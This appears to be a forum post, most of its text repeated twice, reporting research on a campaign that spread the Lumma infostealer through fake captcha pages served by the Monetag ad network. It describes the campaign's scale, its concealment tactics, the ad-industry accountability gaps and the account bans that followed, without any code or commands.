OP 17 December, 2024 - 07:01 AM
A new large-scale campaign to distribute Lumma malware (of the "infostealer" class) through fake captcha pages has been uncovered by researchers from Guardio Labs and Infoblox. Attackers use "malvertising" — the deliberate placement of malicious ads that exploit vulnerabilities in the digital advertising ecosystem. As a result, thousands of victims are at risk of identity theft and financial loss.
According to the study, the campaign relies on the Monetag advertising platform (a subsidiary of PropellerAds) to distribute fake captcha pages. Users encounter these fake pages while browsing seemingly harmless sites where they are asked to verify their identity by passing the 'I am not a robot' verification.
However, when you do this, a PowerShell script runs in the background to install malware. The program is aimed at stealing sensitive data: logins from social networks, banking information, and personal files.
Key findings of the study:
Large-scale reach: over 1 million ad impressions per day, while traffic is redirected through more than 3000 sites.
Malware delivery mechanism: Redirect chains and hidden scripts inject fake captcha pages through advertising networks.
Advanced concealment: Attackers used services such as BeMob to disguise malicious intentions from ad platform moderators.
The role of ad networks
Guardio Labs notes that the infrastructure of ad networks like Monetag facilitates such campaigns. Monetag ad scripts use traffic distribution systems (TDS) that analyze visitors and optimize ad placement. These mechanisms, originally designed for legitimate advertising, are used to distribute harmful content en masse.
Malvertising campaigns thrive due to the blurring of areas of responsibility. Ad networks, tracking services, website publishers, and hosting providers individually play a role, but often shirk direct responsibility. Attackers take advantage of these "blind spots" by first approving harmless creatives and then replacing them with malicious ones.
For more information on combating malvertising, see the NCSC Guidelines "NCSC Publishes Tips to Tackle Malvertising Threat".
"This fake captcha campaign is just one example that demonstrates the shadow side of the Internet's advertising ecosystem," Guardio Labs warns. "As long as advertising remains the cornerstone of the modern internet, the advertising ecosystem itself faces serious conflicts of interest that create a security breach and put users at risk."
Following the publication of the investigation, Monetag and BeMob took action by banning more than 200 accounts associated with the campaign. However, experts emphasize the need for proactive measures, such as constant content moderation and stricter account validation, to prevent new abuses.
According to the study, the campaign relies on the Monetag advertising platform (a subsidiary of PropellerAds) to distribute fake captcha pages. Users encounter these fake pages while browsing seemingly harmless sites where they are asked to verify their identity by passing the 'I am not a robot' verification.
However, when you do this, a PowerShell script runs in the background to install malware. The program is aimed at stealing sensitive data: logins from social networks, banking information, and personal files.
Key findings of the study:
Large-scale reach: over 1 million ad impressions per day, while traffic is redirected through more than 3000 sites.
Malware delivery mechanism: Redirect chains and hidden scripts inject fake captcha pages through advertising networks.
Advanced concealment: Attackers used services such as BeMob to disguise malicious intentions from ad platform moderators.
The role of ad networks
Guardio Labs notes that the infrastructure of ad networks like Monetag facilitates such campaigns. Monetag ad scripts use traffic distribution systems (TDS) that analyze visitors and optimize ad placement. These mechanisms, originally designed for legitimate advertising, are used to distribute harmful content en masse.
Malvertising campaigns thrive due to the blurring of areas of responsibility. Ad networks, tracking services, website publishers, and hosting providers individually play a role, but often shirk direct responsibility. Attackers take advantage of these "blind spots" by first approving harmless creatives and then replacing them with malicious ones.
For more information on combating malvertising, see the NCSC Guidelines "NCSC Publishes Tips to Tackle Malvertising Threat".
"This fake captcha campaign is just one example that demonstrates the shadow side of the Internet's advertising ecosystem," Guardio Labs warns. "As long as advertising remains the cornerstone of the modern internet, the advertising ecosystem itself faces serious conflicts of interest that create a security breach and put users at risk."
Following the publication of the investigation, Monetag and BeMob took action by banning more than 200 accounts associated with the campaign. However, experts emphasize the need for proactive measures, such as constant content moderation and stricter account validation, to prevent new abuses.